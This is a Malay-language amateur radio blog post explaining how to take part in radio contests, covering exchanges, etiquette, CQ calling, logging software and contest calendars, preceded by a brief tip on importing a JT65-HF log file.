Untuk memuatkan log anda ke dalam HRDlog atau LOTTW atau N1MM. Kita hanya perlu import file ADI yang bernama jt65hf_log.ADI dari alamat ini (C:\Users\User\AppData\Local\JT65-HF\) ke mana-mana logging program seperti yang disebutkan tadi. 

                                                                                                                                             9M2ZAK 73.

Friday, March 31, 2017

Mengambil bahagian dalam acara radiosport


Bagaimanakah caranya jika saya ingin menyertai acara Radio Contest? Apakah undang-undang dan peraturannya? dan dimanakah saya boleh merujuk atau meneliti undang-undang tersebut serta mendapatkannya? dan apakah hadiah yang ditawarkan oleh pihak yang menganjurkan Radio Contest tersebut? dan adakah kelas lesen saya itu layak untuk menyertainya?

Saya amat percaya, persoalan diatas akan bermain dibenak masing-masing semasa kalian mula-mula ingin atau berjinak-jinak untuk menyertai Radio Contest. Sebelum ini, kalian hanya ternampak atau terbaca posting rakan-rakan mengenai tarikh contest, dan juga ranking kedudukan mereka dalam setiap kontes yang disertainya. Rasa ingin tahu itu membuak-buak didalam sanubari kalian...jadi dalam paparan kali ini, saya akan cuba menerangkan sejelas yang mungkin segala perkara yang berkaitan dengan Radio Contest ini.

Radio Contest atau juga disebut radiosport ini adalah suatu pertandingan diantara semua station diseluruh dunia, dimana setiap station ini, samada bergerak secara berkumpulan atau solo akan bersaing sesama sendiri mengutip atau mendapatkan contact dari negara lain dengan seberapa banyak yang mungkin dalam jangkamasa yang ditetapkan. Selalunya dalam masa 48 jam pada setiap hari sabtu dan ahad. Pada setiap contest tersebut, pertukaran informasi tertentu dilakukan sebaik sahaja contact berjaya dibuat. Semuanya bergantung kepada peraturan contest, lain contest lain pertukaran infonya. Ada contest yang memerlukan kita bertukar-tukar maklumat umur operator, ada juga yang bertukar jumlah contact terkini masing-masing dan ada juga yang bertukar-tukar CQ Zone. Malah pertukaran grid locator pun ada.
Apabila masa sudah tamat, iaitu cukup 48 jam, setiap peserta dikehendaki menghantar log mereka secara email ke pihak penganjur. Email tersebut boleh didapati dari undang-undang yang mereka sediakan itu. Jadi seelok-eloknya, bacalah dengan teliti undang-undang dan peraturan contest sebelum menyertainya. Ini bertujuan supaya kita tidak melakukan kesilapan semasa pertukaran info dan juga semasa proses penghantaran log kita. Log kita tersebut akan diproses oleh pihak penganjur, cross-checking antara log untuk mendapatkan kesahihannya dan selepas itu mata terkumpul kita itu akan diproses dan disusun mengikut ranking dan kedudukan bagi setiap negara, benua dan dunia.

Apa yang istimewa sangat dengan aktiviti contest ni? sehinggakan ianya mendapat sambutan di seluruh dunia. Malah ada juga yang tanda kalendar masing-masing dari awal tahun hingga ke hujung tahun tarikh-tarikh penting untuk setiap contest ni. Sebenarnya...begini ceritanya.

Kebanyakkan pemegang lesen radio amatur ini secara keseluruhannya adalah terdiri daripada mereka yang berkerja isnin - jumaat. Jadi sudah tentu tiada masa untuk mereka CQ pada sekitar hari tersebut, jika sempat sekalipun...mungkin hanya sekitar sejam dua sahaja iaitu sebelum tidur. Jika perkara ini berterusan...bagaimana pula mereka ingin mencapai sasaran mereka, iaitu mengumpul DXCC sebanyak mana yang mungkin, malah ada yang ingin menguasainya terus. Ianya mungkin akan mengambil masa 7 hingga 10 tahun untuk menghabiskannya malah ada yang lebih daripada itu, Saya sendiri pun masih belum menguasai DXCC, sudah 11 tahun CQ di udara dan hingga kini, masih belum berjaya memenuhi pungutan DXCC iaitu sekitar 330 DXCC.
Jadi dengan menyertai aktiviti contest ini, maka sudah pastilah kutipan DXCC kita ini akan meningkat dengan kadar yang cepat sebab bagi contest yang besar, seperti CQWW dan ARRL, hampir semua station dari seluruh dunia menyertainya. Habis keluar semua peralatan mereka dari bawah katil masing-masing dek kerana ingin menyertai contest ini. Ada yang bergegas ke jabatan perlesenan radio amatur masing-masing untuk menghidupkan dan juga memohon callsign untuk tujuan ini. Jadi, kita boleh jadikan contest ini sebagai short-cut untuk kita capai sasaran DXCC kita. 

Saya percaya, kalau setakat Worked All Continents tu, bagi CQWW...ianya hanya akan ambil masa beberapa jam sahaja untuk mendapatkannya. Itu belum Worked All Japan lagi, Kalau Worked All Japan lagilah...belum habis secangkir kopi sahaja kita boleh mencapainya.  

Selain daripada meningkatkan kutipan DXCC, aktiviti contest ini juga membolehkan kita meningkatkan kemahiran kita. Kemahiran dari segi teknikal seperti membina shack, antenna serta logging system dan juga kemahiran mendengar serta menerima kita. Maksud saya disini ialah, kemahiran mendengar dan mengorek station kecil dari celah-celah barisan QRM Big Station. Kemahiran menguruskan pileup apabila seluruh dunia bertumpu kepada kita. Kemahiran teknikal, iaitu bermain dengan transceiver kita dalam mengharungi keadaan band yang sesak dengan station-station lain, malah kemahiran copy dengan baik, terutama bagi cw, dimana selalunya apabila contest...setiap khz itu akan ada penghuninya dan kita perlu dengar dengan teliti dengan siapa sebenarnya mereka contact, samada dengan kita ataupun dengan jiran sebelah kita. 

Selain daripada itu, aktiviti contest ini jugak boleh mengeratkan tali persaudaraan kita sesama manusia. Secara tidak sedar, sebenarnya kita dalam masa 48 jam itu, kita telah bersatu. Bersatu disini, bukannya bersatu antara lorong tiong 2 dengan lorong merbuk 8, tetapi satu dunia bersatu. Dalam masa 48 jam itu, SELURUH DUNIA BERSATU, hilang semua ideologi dan fahaman serta kepartian. Hilang semua taraf dan kedudukan. Tiada istilah aku ini, dan engkau itu. Semuanya bergerak dan fokus kepada station masing - masing. Inilah keindahan radiosport yang sebenarnya.

Jadi saya rasa, kalian sudah pastinya berkobar-kobar dah ni. Jika sudah sampai ke perenggan ini pembacaan kalian. Maknanya berminatlah tu. Sehubungan dengan itu, dibawah ini saya lampirkan pautan mengenai senarai contest yang ada serta popular pada masa kini. Antaranya ialah :
  1. ARRL DX ( www.arrl.org/contests )
  2. CQ WW ( www.cq-amateur-radio.com ) atau (www.cqww.com )
  3. IARU HF Championship (www.arrl.org/contests)
  4. Worked all Europe WAE ( www.darc.de/referate/dx/fed.htm )
  5. ARRL 10-meter Contest ( www.arrl.org/contests )
  6. All Asian DX Contest ( www.jarl.org/index.html )

Ini pesan saya, jangan terlalu ghairah sangat dek kerana ingin menyertai sesuatu contest. Masa ber-contest adalah masa yang serius. Kita perlu ingat, sebenarnya ada station di luar negara sana yang menghabis puluhan ribu ringgit, malah ada yang cecah ratusan ribu ringgit semata-mata untuk siapkan station mereka. Mereka ini digelar BIG GUN, dan sudah pastinya mereka ada target masing-masing. Jadi marilah kita bersukan dengan penuh tatatertib dan disiplin. Seperti tidak menindan station yang sedang CQ, tidak memotong perbualan orang, tidak tune pada freq yang ada orang dan tidak terus memanggil station tersebut walaupun kita dengar yang dia sedang panggil station lain. Jangan risau, mereka pasti akan layan kita sebentar lagi, sebab bagi contest, satu station amat berharga sekali. Perbezaan satu mata sebenarnya boleh membezakan antara juara dunia dengan juara antara benua.

Jangan risau, kita sebenarnya tidak perlu sebenarnya untuk setup sebuah station yang super power seperti 6KW atau selebihnya untuk menyertai contest ini. Ini adalah kerana, dalam setiap contest, sudah ada kategorinya, seperti high power, low power dan malah, QRP pun ada. Jadi peluang sama rata ini dapat dinikmati oleh semua peringkat. semua orang boleh menyertainya. Yang penting disini ialah... tahu undang-undang, pastikan kategori anda dan CQ-lah.

Saya pasti, kalian pasti pernah dengar mana-mana aktiviti contest, dan semasa mereka bertukar info, masing-masing akan menyatakan seperti berikut,

"9m2m you are 59 8967" atau " 9m2m 5NN 1925"

Walaupun pada ketika itu, kedengaran operator 9M2M berhempas-pulas untuk mendapatkan reportnya, namun ianya tetap disebut 59. Kalian tak rasa pelik ke? Pelik sebab ianya melanggar hukum alam. "aku dengar teruk sahaja, tapi kenapa dia tetap bagi 59? 

Sebenarnya begini bang... dalam contest, malah dalam semua contest sebenarnya. Signal Report atau RST tidak dikira mata sebenarnya, yang dikira adalah exchange sahaja. Jadi kita tidak perlu untuk membuang masa mengamati kualiti signalnya, tetapi perlu mengamati dan dengar betul-betul apakah exchange  atau nombor yang akan diberikan kepada kita. Malah dalam system logging sekalipun, jika kalian masukkan 57 1234 pun tidak akan memberi kesan apa-apa kepada logging system. Komputer tetap akan cari exchange number. 

Seorang contest operator yang baik...dia CQ dengan menyebut sejelas-jelasnya callsignnya. Cuba masuk ke dalam CQ rakan sejurus selepas rakan tersebut habis CQ. Memberikan exchange dengan jelas dan mengulang kembali apabila diminta dan tidak mengulang-ulang banyak kali. Jika station tersebut terus CQ selepas kalian beri exchange, maknanya dia terimalah. Tak perlu ulang dan tanya beliau. Sebab masa itu emas.

 Bagi logging system, saya disini amat tekankan penggunaan log berkomputer. Sebab dengan menggunakan software, kita dapat mengelakkan duplicate serta memudahkan pengiraan mata serta pembetulannya. Jadi kalian tidak perlu risau akan semua perkara tersebut jika menggunakan software. Logging software boleh didapati secara percuma sebenarnya. Apa yang perlu anda lakukan adalah google. Tapi dalam post ini, saya mudahkan kerja kalian, iaitu saya akan senaraikan laman web yang menyediakan software untuk contest log kita. Ada banyak sebenarnya, terpulanglah kepada selera masing-masing. Ini adalah pautannya.
  1. n1mm ( www.n1mm.com)
  2. TR-LOG ( www.qth.com/tr )
  3. WriteLog (www.writelog.com)
  4. N3FJP Contest Loggers (www.n3fjp.com)
Untuk mendapatkan contact dengan banyak, sudah semestinya kita perlu CQ dan bukannya merayau-rayau di sekitar freq dan masuk CQ orang lain. Sebenarnya...semua itu bergantung kepada objektif contest kalian, jika sekadar suka-suka atau ingin mencari DXCC. Maka kaedah itu boleh digunakan. Tetapi jika kita mengejar kemenangan atau ranking. Maka kita perlu CQ.

Panggilan CQ semasa contest adalah berlainan sama sekali dengan panggilan CQ semasa aktiviti DX. Semasa contest, CQ lah dengan seringkas yang boleh dan CQ pada irama yang selesa. Tidak terlalu laju dan tidak terlalu perlahan. Elakkan dari mengeluarkan kata-kata yang kesat dan perkataan yang tidak sepatutnya. Ingat, kita sebenarnya mewakili negara kita. Nama baik negara dan identiti kita perlu dijaga. Kita sebenarnya secara tidak langsung menjadi duta bagi negara kita. Hebat kan?

Seringkas yang boleh adalah seperti berikut,

9M2M contest.... 9M2M contest...

bagi CW atau digital mode, ianya begini.

9M2M Test.... 9M2M test..

Tetapi rata-rata kawan perhatikan, mereka suka tambah perkataan CQ dihadapan, saya faham kenapa, ianya adalah kerana irama. Sebab tanpa perkataan CQ Contest, Kita rasa kekok untuk CQ. Ianya ok dan tidak salah malah hampir semua mengamalkannya. Ingat.. ini pesanan untuk saya dan juga untuk rakan-rakan sekalian. Sebelum memulakan CQ, sila dengar betul-betul pada freq tersebut. Dengar samada freq itu sedang digunakan atau tidak. Kadangkala fenomena skip berlaku, dimana kita hanya mendengar sebelah pihak sahaja, manakala sebelah pihak lagi berada dalam zone skip kita. Ianya sering berlaku antara Malaysia dengan Australia, Malaysia dengan Indonesia dan kadangkala dengan Jepun. Jadi selalunya memulakan dengan ayat ini... " Is the frequency in use? bagi mode Phone. Atau "QRL?" bagi CW

OK, katakan situasi sebaliknya pula berlaku, dimana pada freq tersebut, kita yang sedang menggunakannya dan ada station lain yang bertanya. Maka jawablah dengan penuh tatatertib, contohnya seperti berikut.

" The frequency is in use, CQ contest WAE..." bagi mode PHONE. Manakala bagi mode CW, cukup sekadar dengan membalas "PSE QSY"

Ini ada satu tips untuk kalian mencari parking, jika band crowded. CQ-lah pada bahagian depan band atau pada hujung band. Sebab selalunya pada tempat sebegini, Big Gun tidak lepak kerana jika mereka CQ di 7198.00 contohnya. Splatter mereka akan menerjah masuk ke 7201.00. Jadi ianya sudah melanggar peraturan contest, sebab itu jika hangpa perasan. Big Gun tiada dihujung band

Jadi saya harap rakan-rakan sekalian faham dan lebih memahami akan perjalanan dan sedikit info berkaitan aktiviti contest ini. Lupa pula nak bagitau, kita boleh rujuk jadual contest dalam masa setahun pada laman sesawang ini. http://www.hornucopia.com Dimana dalam wesite ini, ada disertakan jadual contest bagi sepanjang tahun.

Baiklah sampai setakat ini sajalah coretan kawan mengenai radiosport ini, diharap kalian semua faham dan jangan malu jangan segan, sertailah acara contest kerana banyak kelebihannya. Saya pun tidak terduga akan semua kelebihan ini, Dunia sedang memerhatikan anda. Percayalah.

73 dari saya, Zaki 9M2ZAK

9m2mdx Great Dxer From Alor Gajah, Melaka

9m2mdx Nazmi adalah satu lagi tanda panggilan yang tidak asing lagi dalam dunia radio amatur. Khususnya dalam aktiviti radio contest. ...